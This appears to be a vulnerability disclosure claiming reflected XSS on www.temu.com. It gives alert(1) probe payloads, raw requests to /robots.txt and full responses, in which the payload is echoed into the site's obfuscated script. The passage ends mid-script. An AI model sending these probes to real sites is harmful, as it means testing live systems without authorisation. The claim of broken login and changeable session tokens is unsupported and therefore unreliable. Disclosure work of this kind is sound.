Reflected XSS (Cross-Site Scripting) is a type of web vulnerability that allows an

attacker to inject malicious code into a website, which is then executed by the
victim’s browser. This happens when the website includes untrusted user input in
its pages without proper validation or encoding. The attacker crafts a special link
or form that, when clicked or submitted by the victim, causes the victim’s browser
to execute the malicious code. The victim’s browser is tricked into thinking the
code is part of the website, allowing the attacker to steal sensitive information
or perform other malicious actions and even the session tokens are available which
can be changable while sending the link as the authentication is broken in the
/login.html .
Background issues :-
Reflected cross-site scripting vulnerabilities arise when data is copied from a
request and echoed into the application's immediate response in an unsafe way. An
attacker can use the vulnerability to construct a request that, if issued by
another application user, will cause JavaScript code supplied by the attacker to
execute within the user's browser in the context of that user's session with the
application.
The attacker-supplied code can perform a wide variety of actions, such as stealing
the victim's session token or login credentials, performing arbitrary actions on
the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For
example, the attacker can send a victim a link containing a malicious URL in an
email or instant message. They can submit the link to popular web sites that allow
content authoring, for example in blog comments. And they can create an innocuous
looking web site that causes anyone viewing it to make arbitrary cross-domain
requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the
nature of the vulnerable application, the kinds of data and functionality that it
contains, and the other applications that belong to the same domain and
organization. If the application is used only to display non-sensitive public
content, with no authentication or access control functionality, then a cross-site
scripting flaw may be considered low risk. However, if the same application resides
on a domain that can access cookies for other more security-critical applications,
then the vulnerability could be used to attack those other applications, and so may
be considered high risk. Similarly, if the organization that owns the application
is a likely target for phishing attacks, then the vulnerability could be leveraged
to lend credibility to such attacks, by injecting Trojan functionality into the
vulnerable application and exploiting users' trust in the organization in order to
capture credentials for other applications that it owns. In many kinds of
application, such as those providing online banking functionality, cross-site
scripting should always be considered high risk.
Steps To Reproduce:
To exploit this vulnerability, an attacker would need to craft a specially-crafted
link that contains the malicious JavaScript code. The attacker would then need to
trick the user into clicking on the link, which would cause the code to be
executed. This could be done through social engineering tactics, such as phishing
emails or instant messaging or even with other processes
Payloads used :-
cef6j'-alert(1)-'c8ipm
t48kx'-alert(1)-'s29z6
Classisfication:-
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site
Scripting')
CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic
XSS)
CWE-116: Improper Encoding or Escaping of Output
CWE-159: Failure to Sanitize Special Element
CAPEC-591: Reflected XSS
resquested :-
GET /robots.txt?cef6j'-alert(1)-'c8ipm=1 HTTP/2
Host: www.temu.com
Accept-Encoding: gzip, deflate, br
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/121.0.6167.160 Safari/537.36
Connection: close
Cache-Control: max-age=0
GET /robots.txtt48kx'-alert(1)-'s29z6 HTTP/2
Host: www.temu.com
Accept-Encoding: gzip, deflate, br
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/121.0.6167.160 Safari/537.36
Connection: close
Cache-Control: max-age=0
Responce I get :-
HTTP/2 200 OK Date: Mon, 29 Apr 2024 01:24:23 GMT Content-Type: text/html;
charset=utf-8 Vary: Accept-Encoding Cip: 47.11.194.2 Cf-Cache-Status: DYNAMIC Set-
Cookie: __cf_bm=LQMnTD_MoUaJsVgkYEap5pGijiPAXv4M4vst_Qep.t4-1714353863-1.0.1.1-
tjc4AyoinAtNtQd7o_7MFUMJ3dyf2I4lOhDTsq.6VIWorPEt17swBrwwfvq1WT1SFACCl.8HlQnwFECVMlf
WRg; path=/; expires=Mon, 29-Apr-24 01:54:23 GMT; domain=.temu.com; HttpOnly;
Secure; SameSite=None Server: cloudflare Cf-Ray: 87bb7dfcd8b494be-CCU Alt-Svc:
h3=":443"; ma=86400
<html><body><script type="text/javascript"></script><script>var
_0x43f1=['fwUcS','keys','reload','wHLJB','WoDem','setRequestHeader','gFDVx','messag
e','rep','onreadystatechange','error_msg','ZFfOY','swSmy','WCvPA','SzlGe','userAgen
t','xIfpS','fromCharCode','tc4fb4ecc7c30b8e73c1485ce6377422ca','vfXMb','method','/
robots.txt?cef6j'-alert(1)-'c8ipm=1','MLWUt','slice','OIXif','HsxCT','application/
json','mPRLv','GRWYj','NdwJC','uSCgy','JPgvy','ImGrd','SNcrg','gEOGy','zEAbc','appl
y','c-
jc','gCKRy','QwXya','lkzlV','DOWuQ','stringify','ZAlRj','onSuccess','open','bfXle',
'ZOGTb','send','yYqeu','zBMaP','rhGoG','atob','jKrAI','url','aAyDE','eGdPO','subtle
','catch','key','i/
s','then','status','LlCXk','QalwX','charCodeAt','splHr','+x2L76cqZfAgdhNC6IfU7xs9AY
1tbDMjq2NG9oIEt5Wv2nkSdVlnB3PONGanzN+vAQRqFN4C4+hS3CaoU+bQc97zjBZEV+ORJQ5NhC58FBmVt
yK0W+wXWrfUU3t/7ScaG5Zo9PJLRVsBGu4Bx6+0N/T1MShaAlOh8pApGBkEJtVFMHtm36uMTRBjAE/
P5XJoudf/
42Hs3v5Iig9f01gmvTb7Wyc5J3SPHBlteyJBPPt5bT8qvHANkqffUZFELPX5','IfwYq','KnWDt','xCKP
q','WVlmi','importKey','headers','sVytz','fUBCJ','iYOqI','iCzJz','GET','POST','data
','href','split','xnlLx','forEach','QiCRA','readyState','zWKMr','eQYat','WCFvR','ma
p','cOMdA','decrypt'];(function(_0x208cd6,_0x43f1d5){var
_0x41323a=function(_0x14ded8){while(--_0x14ded8){_0x208cd6['push']
(_0x208cd6['shift']());}};_0x41323a(++_0x43f1d5);}(_0x43f1,0xec));var
_0x4132=function(_0x208cd6,_0x43f1d5){_0x208cd6=_0x208cd6-0x0;var
_0x41323a=_0x43f1[_0x208cd6];return _0x41323a;};!function(){var
_0x231244={};_0x231244['xIfpS']=function(_0x191b5d,_0x1ab40f){return
_0x191b5d(_0x1ab40f);};_0x231244[_0x4132('0x47')]=function(_0x1c079,_0x2647f7)
{return _0x1c079!
==_0x2647f7;};_0x231244[_0x4132('0xd')]=_0x4132('0x15');_0x231244[_0x4132('0x59')]=
'raw';_0x231244[_0x4132('0x39')]=_0x4132('0x2a');_0x231244['xnlLx']=function(_0x6aa
7e0,_0x315760){return _0x6aa7e0!
==_0x315760;};_0x231244[_0x4132('0x49')]=_0x4132('0x38');_0x231244[_0x4132('0x10')]
=_0x4132('0x51');_0x231244[_0x4132('0x13')]=function(_0x151ed9,_0x177533){return
_0x151ed9===_0x177533;};_0x231244[_0x4132('0x2f')]=function(_0x57ffae){return
_0x57ffae();};_0x231244[_0x4132('0x25')]=function(_0x403447){return
_0x403447();};_0x231244[_0x4132('0x2e')]='mCUrr';_0x231244[_0x4132('0x44')]=_0x4132
('0x4d');_0x231244['jKrAI']=function(_0xeb1b48,_0x311cd6){return _0xeb1b48||
_0x311cd6;};_0x231244[_0x4132('0x31')]=_0x4132('0x1c');_0x231244['WCFvR']=_0x4132('
0x3e');_0x231244['NdwJC']=_0x4132('0x1d');_0x231244['ZFfOY']=function(_0x253985,_0x
d2992c){return
_0x253985+_0xd2992c;};_0x231244[_0x4132('0x29')]=function(_0xa61f0b,_0x541d20)
{return
_0xa61f0b+_0x541d20;};_0x231244[_0x4132('0x6')]=function(_0x241c2d,_0x598606)
{return
_0x241c2d+_0x598606;};_0x231244[_0x4132('0x37')]=_0x4132('0xa');_0x231244[_0x4132('
0x56')]=_0x4132('0x50');_0x231244[_0x4132('0x14')]=_0x4132('0x33');_0x231244[_0x413
2('0x12')]=_0x4132('0x45');_0x231244['DOWuQ']=function(_0x153c80){return
_0x153c80();};_0x231244[_0x4132('0x1b')]=function(_0x2e26fd,_0x632bf2){return
_0x2e26fd(_0x632bf2);};_0x231244[_0x4132('0x19')]=function(_0x4bd670,_0x3d9535)
{return _0x4bd670!
==_0x3d9535;};_0x231244[_0x4132('0x52')]=function(_0x53af3b,_0x1018b2){return
_0x53af3b(_0x1018b2);};_0x231244[_0x4132('0x46')]=_0x4132('0x3d');_0x231244['aAyDE'
]=_0x4132('0x11');_0x231244[_0x4132('0x2b')]='moytj4zg87xe2f5s';_0x231244['OIXif']=
function(_0x171ccf,_0x2541c6){return
_0x171ccf===_0x2541c6;};_0x231244[_0x4132('0x4b')]='mPwaI';_0x231244[_0x4132('0x41'
)]=function(_0x4a7656,_0x77ad3b,_0x4c5dcf){return
_0x4a7656(_0x77ad3b,_0x4c5dcf);};_0x231244[_0x4132('0x26')]=_0x4132('0x1');_0x23124
4[_0x4132('0x5c')]=function(_0x444fab,_0x25e5a4){return _0x444fab(_0x25e5a4);};var
_0x2de96e=_0x231244;var
_0xf1aa4c=_0x2de96e['mPRLv'],_0x56a3b8=_0x2de96e[_0x4132('0x5')],_0x392d9a=_0x2de96
e[_0x4132('0x2b')];function _0x3f6e60(_0x4b9898){return new
Uint8Array(_0x4b9898[_0x4132('0x20')]('')[_0x4132('0x28')](function(_0x407560)
{return _0x407560[_0x4132('0xf')](0x0);}));}function _0xbdc4a7(_0x2ec911,_0x4b96a1)
{if(_0x2de96e[_0x4132('0x47')]
(_0x2de96e[_0x4132('0xd')],_0x2de96e[_0x4132('0xd')])){return
_0x2ec911[_0x4132('0xf')](0x0);}else{var _0x3316f9=window[_0x4132('0x2')]
(_0x2ec911),_0x15e86e=_0x2de96e[_0x4132('0x3b')](_0x3f6e60,_0x3316f9['slice']
(0x0,0xc)),_0x1f1e39=_0x3f6e60(_0x4b96a1),_0x40132e={'name':String['fromCharCode']
(0x41,0x45,0x53,0x2d,0x47,0x43,0x4d),'iv':_0x15e86e};return crypto['subtle']
[_0x4132('0x16')](_0x2de96e['bfXle'],_0x1f1e39,_0x40132e,!0x1,[_0x2de96e['SzlGe']])
[_0x4132('0xb')](function(_0x5b4f56){var _0x3bcc08=_0x2de96e[_0x4132('0x3b')]
(_0x3f6e60,_0x3316f9[_0x4132('0x42')](0xc));return crypto[_0x4132('0x7')]
['decrypt'](_0x40132e,_0x5b4f56,_0x3bcc08)[_0x4132('0xb')](function(_0x294ba7)
{return _0x1d2ce7=_0x294ba7,String[_0x4132('0x3c')][_0x4132('0x4f')](null,new
Uint8Array(_0x1d2ce7));var _0x1d2ce7;});});}}function _0x423b31(_0x1bcae2){var
_0x5dd67d={};_0x5dd67d[_0x4132('0x53')]=function(_0x3754dd){return
_0x2de96e[_0x4132('0x25')](_0x3754dd);};var
_0x3918b5=_0x5dd67d;if(_0x2de96e[_0x4132('0x21')]
(_0x2de96e[_0x4132('0x2e')],_0x2de96e[_0x4132('0x44')])){var
_0x100415=_0x1bcae2[_0x4132('0x3f')],_0x510937=_0x1bcae2[_0x4132('0x4')],_0x49a909=
_0x1bcae2[_0x4132('0x17')],_0x3c470b=_0x1bcae2[_0x4132('0x1e')],_0x202920=_0x1bcae2
['onSuccess'],_0x3aa296=new XMLHttpRequest();_0x3aa296[_0x4132('0x34')]=function()
{0x4===_0x3aa296['readyState']&&_0x3aa296[_0x4132('0xc')]&&_0x202920&&_0x3918b5[_0x
4132('0x53')](_0x202920);},_0x3aa296['open'](_0x2de96e[_0x4132('0x3')]
(_0x100415,_0x2de96e[_0x4132('0x31')]),_0x510937,!
0x0),_0x49a909&&Object[_0x4132('0x2c')](_0x49a909)['forEach'](function(_0x211e84)
{if(_0x2de96e['xnlLx'](_0x2de96e['uSCgy'],_0x2de96e[_0x4132('0x10')]))
{_0x3aa296[_0x4132('0x30')](_0x211e84,_0x49a909[_0x211e84]);}else{var
_0x5a8abc={};_0x5a8abc[_0x4132('0x4c')]=function(_0x17a92b,_0x1ebe8f){return
_0x17a92b(_0x1ebe8f);};var _0xe1fb3e=_0x5a8abc;_0x3c470b(_0x100415,_0x510937)
[_0x4132('0xb')](function(_0x12d99e){var
_0x2757fd={};_0x2757fd[_0x211e84]=_0x12d99e,_0xe1fb3e[_0x4132('0x4c')](_0x202920,
{'url':_0x4132('0x40'),'headers':_0x2757fd,'onSuccess':function()
{location[_0x4132('0x2d')]();}});})['catch'](_0x3aa296);}}),_0x3aa296['send']
(_0x3c470b);}else{_0x2de96e['KnWDt']
(0x4,_0x3aa296[_0x4132('0x24')])&&_0x3aa296[_0x4132('0xc')]&&_0x202920&&_0x2de96e[_
0x4132('0x2f')](_0x202920);}}function _0x2c0f57(_0x846617)
{if(_0x2de96e[_0x4132('0x27')]===_0x2de96e[_0x4132('0x27')]){var
_0x17fe37={};_0x17fe37['ua']=navigator[_0x4132('0x3a')];_0x17fe37[_0x4132('0x1f')]=
location[_0x4132('0x1f')];_0x17fe37[_0x4132('0x35')]=_0x846617[_0x4132('0x32')];_0x
17fe37['stack']=_0x846617['stack'];_0x17fe37['hn']=_0xf1aa4c;_0x17fe37['hv']=_0x56a
3b8;_0x17fe37[_0x4132('0x9')]=_0x392d9a;_0x2de96e[_0x4132('0x3b')](_0x423b31,
{'method':_0x2de96e[_0x4132('0x48')],'url':_0x2de96e[_0x4132('0x36')]
(_0x2de96e[_0x4132('0x36')](_0x2de96e[_0x4132('0x29')](_0x2de96e[_0x4132('0x29')]
(_0x2de96e[_0x4132('0x6')](_0x2de96e[_0x4132('0x6')](_0x2de96e['eGdPO']('/
a','pp'[0x0]),_0x2de96e[_0x4132('0x37')]),'ee'[0x0]),_0x2de96e[_0x4132('0x56')]),'/
'[0x0]),_0x2de96e[_0x4132('0x14')])+'o'[0x0],'rt'),'headers':{'Content-
Type':_0x2de96e[_0x4132('0x12')]},'data':JSON[_0x4132('0x55')]
(_0x17fe37)});}else{return _0x1b85df=_0xf1aa4c,String[_0x4132('0x3c')]
[_0x4132('0x4f')](null,new Uint8Array(_0x1b85df));var
_0x1b85df;}}try{if(_0x2de96e[_0x4132('0x43')](_0x4132('0x4e'),_0x2de96e['ImGrd']))
{var
_0x20e3b4=_0xf1aa4c[_0x4132('0x3f')],_0x2fa37d=_0xf1aa4c[_0x4132('0x4')],_0x5a1f18=
_0xf1aa4c['headers'],_0x224a13=_0xf1aa4c[_0x4132('0x1e')],_0x534a32=_0xf1aa4c[_0x41
32('0x57')],_0xfcbdf1=new
XMLHttpRequest();_0xfcbdf1['onreadystatechange']=function(){_0x2de96e['KnWDt']
(0x4,_0xfcbdf1[_0x4132('0x24')])&&_0xfcbdf1[_0x4132('0xc')]&&_0x534a32&&_0x2de96e[_
0x4132('0x54')](_0x534a32);},_0xfcbdf1[_0x4132('0x58')](_0x2de96e[_0x4132('0x3')]
(_0x20e3b4,_0x2de96e[_0x4132('0x31')]),_0x2fa37d,!0x0),_0x5a1f18&&Object['keys']
(_0x5a1f18)[_0x4132('0x22')](function(_0x3442fa){_0xfcbdf1['setRequestHeader']
(_0x3442fa,_0x5a1f18[_0x3442fa]);}),_0xfcbdf1[_0x4132('0x5b')]
(_0x224a13);}else{_0x2de96e[_0x4132('0x41')](_0xbdc4a7,_0x56a3b8,_0x392d9a)
[_0x4132('0xb')](function(_0x15b95d){var
_0x21f58d={};_0x21f58d[_0xf1aa4c]=_0x15b95d,_0x2de96e[_0x4132('0x52')](_0x423b31,
{'url':_0x4132('0x40'),'headers':_0x21f58d,'onSuccess':function(){var
_0x1f8375={};_0x1f8375['ZOGTb']=function(_0x13c2ad,_0x10f9e1){return
_0x2de96e[_0x4132('0x1b')]
(_0x13c2ad,_0x10f9e1);};_0x1f8375[_0x4132('0x1a')]=_0x2de96e[_0x4132('0x48')];_0x1f
8375[_0x4132('0x4a')]=function(_0x2385ec,_0x438996){return _0x2de96e['eGdPO']
(_0x2385ec,_0x438996);};_0x1f8375[_0x4132('0x23')]=_0x2de96e[_0x4132('0x56')];_0x1f
8375[_0x4132('0xe')]=_0x2de96e[_0x4132('0x14')];_0x1f8375[_0x4132('0x0')]=_0x2de96e
[_0x4132('0x12')];var _0x4c322b=_0x1f8375;if(_0x2de96e['fUBCJ']
(_0x4132('0x18'),_0x4132('0x18'))){var
_0x1dd331={};_0x1dd331['ua']=navigator[_0x4132('0x3a')];_0x1dd331[_0x4132('0x1f')]=
location[_0x4132('0x1f')];_0x1dd331[_0x4132('0x35')]=_0x3f6e60[_0x4132('0x32')];_0x
1dd331['stack']=_0x3f6e60['stack'];_0x1dd331['hn']=_0xf1aa4c;_0x1dd331['hv']=_0x15b
95d;_0x1dd331[_0x4132('0x9')]=_0x21f58d;_0x4c322b[_0x4132('0x5a')](_0x423b31,
{'method':_0x4c322b[_0x4132('0x1a')],'url':_0x4c322b[_0x4132('0x4a')]
(_0x4c322b['JPgvy'](_0x4c322b[_0x4132('0x4a')](_0x4c322b[_0x4132('0x4a')]('/
a'+'pp'[0x0],_0x4132('0xa')),'ee'[0x0])
+_0x4c322b[_0x4132('0x23')],'/'[0x0]),_0x4c322b[_0x4132('0xe')])
+'o'[0x0]+'rt','headers':{'Content-
Type':_0x4c322b[_0x4132('0x0')]},'data':JSON[_0x4132('0x55')]
(_0x1dd331)});}else{location[_0x4132('0x2d')]();}}});})[_0x4132('0x8')]
(_0x2c0f57);}}catch(_0xac70d){if(_0x2de96e[_0x4132('0x26')]!=='gyusG')
{_0x2de96e[_0x4132('0x5c')](_0x2c0f57,_0xac70d);}else{location[_0x4132('0x2d')]
();}}}();</script></body></html>
HTTP/2 200 OK
Date: Mon, 29 Apr 2024 01:30:08 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cip: 47.11.194.2
Cf-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=4dkZEUoFFl5br2NqG7Olag8ZwvCvHCKxqd4exmjcH5c-1714354208-1.0.1.1-
CjmOveTdVaNthOsFTx6Gk2ZGpvq21ZRFdWlgrw6d1KE.lhwZ3oHGv0Ke_Ion0mPvcrg0dqPwA_iPpcZYDDO
utA; path=/; expires=Mon, 29-Apr-24 02:00:08 GMT; domain=.temu.com; HttpOnly;
Secure; SameSite=None
Server: cloudflare
Cf-Ray: 87bb866bcac094b2-CCU
Alt-Svc: h3=":443"; ma=86400
<html><body><script type="text/javascript"></script><script>var
_0x43f1=['fwUcS','keys','reload','wHLJB','WoDem','setRequestHeader','gFDVx','messag
e','rep','onreadystatechange','error_msg','ZFfOY','swSmy','WCvPA','SzlGe','userAgen
t','xIfpS','fromCharCode','tc4fb4ecc7c30b8e73c1485ce6377422ca','vfXMb','method','/
robots.txtt48kx'-alert(1)-'s29z6','MLWUt','slice','OIXif','HsxCT','application/
json','mPRLv','GRWYj','NdwJC','uSCgy','JPgvy','ImGrd','SNcrg','gEOGy','zEAbc','appl
y','c-
jc','gCKRy','QwXya','lkzlV','DOWuQ','stringify','ZAlRj','onSuccess','open','bfXle',
'ZOGTb','send','yYqeu','zBMaP','rhGoG','atob','jKrAI','url','aAyDE','eGdPO','subtle
','catch','key','i/
s','then','status','LlCXk','QalwX','charCodeAt','splHr','HOKYJNhzsSwMjYvMLIiPXHxxC0
NLGa4huYpR8YJhvEaFg4v05HWKR4t8nvhbZDfW8ov8bXe4MnOeXuVNGLGDgZyJdpNgKCLyFEyH5Yv4MG3nE
XZOixuIK2DCWSKv96uQaYtXKmRbnrcYlu76vsJ5I4TUR1zc2Sr6241fwu4HIZEP6sk4lC3l04LY/
iuoHjqz+SQCYezxhmg2bAbNcPqsg3rd8kRf90oa/
NJVwVHSM9faebiHORQUhgwm1757ya9c','IfwYq','KnWDt','xCKPq','WVlmi','importKey','heade
rs','sVytz','fUBCJ','iYOqI','iCzJz','GET','POST','data','href','split','xnlLx','for
Each','QiCRA','readyState','zWKMr','eQYat','WCFvR','map','cOMdA','decrypt'];
(function(_0x208cd6,_0x43f1d5){var _0x41323a=function(_0x14ded8){while(--_0x14ded8)
{_0x208cd6['push'](_0x208cd6['shift']());}};_0x41323a(++_0x43f1d5);}
(_0x43f1,0xec));var _0x4132=function(_0x208cd6,_0x43f1d5){_0x208cd6=_0x208cd6-
0x0;var _0x41323a=_0x43f1[_0x208cd6];return _0x41323a;};!function(){var
_0x231244={};_0x231244['xIfpS']=function(_0x191b5d,_0x1ab40f){return
_0x191b5d(_0x1ab40f);};_0x231244[_0x4132('0x47')]=function(_0x1c079,_0x2647f7)
{return _0x1c079!
==_0x2647f7;};_0x231244[_0x4132('0xd')]=_0x4132('0x15');_0x231244[_0x4132('0x59')]=
'raw';_0x231244[_0x4132('0x39')]=_0x4132('0x2a');_0x231244['xnlLx']=function(_0x6aa
7e0,_0x315760){return _0x6aa7e0!
==_0x315760;};_0x231244[_0x4132('0x49')]=_0x4132('0x38');_0x231244[_0x4132('0x10')]
=_0x4132('0x51');_0x231244[_0x4132('0x13')]=function(_0x151ed9,_0x177533){return
_0x151ed9===_0x177533;};_0x231244[_0x4132('0x2f')]=function(_0x57ffae){return
_0x57ffae();};_0x231244[_0x4132('0x25')]=function(_0x403447){return
_0x403447();};_0x231244[_0x4132('0x2e')]='mCUrr';_0x231244[_0x4132('0x44')]=_0x4132
('0x4d');_0x231244['jKrAI']=function(_0xeb1b48,_0x311cd6){return _0xeb1b48||
_0x311cd6;};_0x231244[_0x4132('0x31')]=_0x4132('0x1c');_0x231244['WCFvR']=_0x4132('
0x3e');_0x231244['NdwJC']=_0x4132('0x1d');_0x231244['ZFfOY']=function(_0x253985,_0x
d2992c){return
_0x253985+_0xd2992c;};_0x231244[_0x4132('0x29')]=function(_0xa61f0b,_0x541d20)
{return
_0xa61f0b+_0x541d20;};_0x231244[_0x4132('0x6')]=function(_0x241c2d,_0x598606)
{return
_0x241c2d+_0x598606;};_0x231244[_0x4132('0x37')]=_0x4132('0xa');_0x231244[_0x4132('
0x56')]=_0x4132('0x50');_0x231244[_0x4132('0x14')]=_0x4132('0x33');_0x231244[_0x413
2('0x12')]=_0x4132('0x45');_0x231244['DOWuQ']=function(_0x153c80){return
_0x153c80();};_0x231244[_0x4132('0x1b')]=function(_0x2e26fd,_0x632bf2){return
_0x2e26fd(_0x632bf2);};_0x231244[_0x4132('0x19')]=function(_0x4bd670,_0x3d9535)
{return _0x4bd670!
==_0x3d9535;};_0x231244[_0x4132('0x52')]=function(_0x53af3b,_0x1018b2){return
_0x53af3b(_0x1018b2);};_0x231244[_0x4132('0x46')]=_0x4132('0x3d');_0x231244['aAyDE'
]=_0x4132('0x11');_0x231244[_0x4132('0x2b')]='0m6s0yekeecrklqt';_0x231244['OIXif']=
function(_0x171ccf,_0x2541c6){return
_0x171ccf===_0x2541c6;};_0x231244[_0x4132('0x4b')]='mPwaI';_0x231244[_0x4132('0x41'
)]=function(_0x4a7656,_0x77ad3b,_0x4c5dcf){return
_0x4a7656(_0x77ad3b,_0x4c5dcf);};_0x231244[_0x4132('0x26')]=_0x4132('0x1');_0x23124
4[_0x4132('0x5c')]=function(_0x444fab,_0x25e5a4){return _0x444fab(_0x25e5a4);};var
_0x2de96e=_0x231244;var
_0xf1aa4c=_0x2de96e['mPRLv'],_0x56a3b8=_0x2de96e[_0x4132('0x5')],_0x392d9a=_0x2de96
e[_0x4132('0x2b')];function _0x3f6e60(_0x4b9898){return new
Uint8Array(_0x4b9898[_0x4132('0x20')]('')[_0x4132('0x28')](function(_0x407560)
{return _0x407560[_0x4132('0xf')](0x0);}));}function _0xbdc4a7(_0x2ec911,_0x4b96a1)
{if(_0x2de96e[_0x4132('0x47')]
(_0x2de96e[_0x4132('0xd')],_0x2de96e[_0x4132('0xd')])){return
_0x2ec911[_0x4132('0xf')](0x0);}else{var _0x3316f9=window[_0x4132('0x2')]
(_0x2ec911),_0x15e86e=_0x2de96e[_0x4132('0x3b')](_0x3f6e60,_0x3316f9['slice']
(0x0,0xc)),_0x1f1e39=_0x3f6e60(_0x4b96a1),_0x40132e={'name':String['fromCharCode']
(0x41,0x45,0x53,0x2d,0x47,0x43,0x4d),'iv':_0x15e86e};return crypto['subtle']
[_0x4132('0x16')](_0x2de96e['bfXle'],_0x1f1e39,_0x40132e,!0x1,[_0x2de96e['SzlGe']])
[_0x4132('0xb')](function(_0x5b4f56){var _0x3bcc08=_0x2de96e[_0x4132('0x3b')]
(_0x3f6e60,_0x3316f9[_0x4132('0x42')](0xc));return crypto[_0x4132('0x7')]
['decrypt'](_0x40132e,_0x5b4f56,_0x3bcc08)[_0x4132('0xb')](function(_0x294ba7)
{return _0x1d2ce7=_0x294ba7,String[_0x4132('0x3c')][_0x4132('0x4f')](null,new
Uint8Array(_0x1d2ce7));var _0x1d2ce7;});});}}function _0x423b31(_0x1bcae2){var
_0x5dd67d={};_0x5dd67d[_0x4132('0x53')]=function(_0x3754dd){return
_0x2de96e[_0x4132('0x25')](_0x3754dd);};var
_0x3918b5=_0x5dd67d;if(_0x2de96e[_0x4132('0x21')]
(_0x2de96e[_0x4132('0x2e')],_0x2de96e[_0x4132('0x44')])){var
_0x100415=_0x1bcae2[_0x4132('0x3f')],_0x510937=_0x1bcae2[_0x4132('0x4')],_0x49a909=
_0x1bcae2[_0x4132('0x17')],_0x3c470b=_0x1bcae2[_0x4132('0x1e')],_0x202920=_0x1bcae2
['onSuccess'],_0x3aa296=new XMLHttpRequest();_0x3aa296[_0x4132('0x34')]=function()
{0x4===_0x3aa296['readyState']&&_0x3aa296[_0x4132('0xc')]&&_0x202920&&_0x3918b5[_0x
4132('0x53')](_0x202920);},_0x3aa296['open'](_0x2de96e[_0x4132('0x3')]
(_0x100415,_0x2de96e[_0x4132('0x31')]),_0x510937,!
0x0),_0x49a909&&Object[_0x4132('0x2c')](_0x49a909)['forEach'](function(_0x211e84)
{if(_0x2de96e['xnlLx'](_0x2de96e['uSCgy'],_0x2de96e[_0x4132('0x10')]))
{_0x3aa296[_0x4132('0x30')](_0x211e84,_0x49a909[_0x211e84]);}else{var
_0x5a8abc={};_0x5a8abc[_0x4132('0x4c')]=function(_0x17a92b,_0x1ebe8f){return
_0x17a92b(_0x1ebe8f);};var _0xe1fb3e=_0x5a8abc;_0x3c470b(_0x100415,_0x510937)
[_0x4132('0xb')](function(_0x12d99e){var
_0x2757fd={};_0x2757fd[_0x211e84]=_0x12d99e,_0xe1fb3e[_0x4132('0x4c')](_0x202920,
{'url':_0x4132('0x40'),'headers':_0x2757fd,'onSuccess':function()
{location[_0x4132('0x2d')]();}});})['catch'](_0x3aa296);}}),_0x3aa296['send']
(_0x3c470b);}else{_0x2de96e['KnWDt']
(0x4,_0x3aa296[_0x4132('0x24')])&&_0x3aa296[_0x4132('0xc')]&&_0x202920&&_0x2de96e[_
0x4132('0x2f')](_0x202920);}}function _0x2c0f57(_0x846617)
{if(_0x2de96e[_0x4132('0x27')]===_0x2de96e[_0x4132('0x27')]){var
_0x17fe37={};_0x17fe37['ua']=navigator[_0x4132('0x3a')];_0x17fe37[_0x4132('0x1f')]=
location[_0x4132('0x1f')];_0x17fe37[_0x4132('0x35')]=_0x846617[_0x4132('0x32')];_0x
17fe37['stack']=_0x846617['stack'];_0x17fe37['hn']=_0xf1aa4c;_0x17fe37['hv']=_0x56a
3b8;_0x17fe37[_0x4132('0x9')]=_0x392d9a;_0x2de96e[_0x4132('0x3b')](_0x423b31,
{'method':_0x2de96e[_0x4132('0x48')],'url':_0x2de96e[_0x4132('0x36')]
(_0x2de96e[_0x4132('0x36')](_0x2de96e[_0x4132('0x29')](_0x2de96e[_0x4132('0x29')]
(_0x2de96e[_0x4132('0x6')](_0x2de96e[_0x4132('0x6')](_0x2de96e['eGdPO']('/
a','pp'[0x0]),_0x2de96e[_0x4132('0x37')]),'ee'[0x0]),_0x2de96e[_0x4132('0x56')]),'/
'[0x0]),_0x2de96e[_0x4132('0x14')])+'o'[0x0],'rt'),'headers':{'Content-
Type':_0x2de96e[_0x4132('0x12')]},'data':JSON[_0x4132('0x55')]
(_0x17fe37)});}else{return _0x1b85df=_0xf1aa4c,String[_0x4132('0x3c')]
[_0x4132('0x4f')](null,new Uint8Array(_0x1b85df));var
_0x1b85df;}}try{if(_0x2de96e[_0x4132('0x43')](_0x4132('0x4e'),_0x2de96e['ImGrd']))
{var
_0x20e3b4=_0xf1aa4c[_0x4132('0x3f')],_0x2fa37d=_0xf1aa4c[_0x4132('0x4')],_0x5a1f18=
_0xf1aa4c['headers'],_0x224a13=_0xf1aa4c[_0x4132('0x1e')],_0x534a32=_0xf1aa4c[_0x41
32('0x57')],_0xfcbdf1=new
XMLHttpRequest();_0xfcbdf1['onreadystatechange']=function(){_0x2de96e['KnWDt']
(0x4,_0xfcbdf1[_0x4132('0x24')])&&_0xfcbdf1[_0x4132('0xc')]&&_0x534a32&&_0x2de96e[_
0x4132('0x54')](_0x534a32);},_0xfcbdf1[_0x4132('0x58')](_0x2de96e[_0x4132('0x3')]
(_0x20e3b4,_0x2de96e[_0x4132('0x31')]),_0x2fa37d,!0x0),_0x5a1f18&&Object['keys']
(_0x5a1f18)[_0x4132('0x22')](function(_0x3442fa){_0xfcbdf1['setRequestHeader']
(_0x3442fa,_0x5a1f18[_0x3442fa]);}),_0xfcbdf1[_0x4132('0x5b')]
(_0x224a13);}else{_0x2de96e[_0x4132('0x41')](_0xbdc4a7,_0x56a3b8,_0x392d9a)
[_0x4132('0xb')](function(_0x15b95d){var
_0x21f58d={};_0x21f58d[_0xf1aa4c]=_0x15b95d,_0x2de96e[_0x4132('0x52')](_0x423b31,
{'url':_0x4132('0x40'),'headers':_0x21f58d,'onSuccess':function(){var
_0x1f8375={};_0x1f8375['ZOGTb']=function(_0x13c2ad,_0x10f9e1){return
_0x2de96e[_0x4132('0x1b')]
(_0x13c2ad,_0x10f9e1);};_0x1f8375[_0x4132('0x1a')]=_0x2de96e[_0x4132('0x48')];_0x1f
8375[_0x4132('0x4a')]=function(_0x2385ec,_0x438996){return _0x2de96e['eGdPO']
(_0x2385ec,_0x438996);};_0x1f8375[_0x4132('0x23')]=_0x2de96e[_0x4132('0x56')];_0x1f
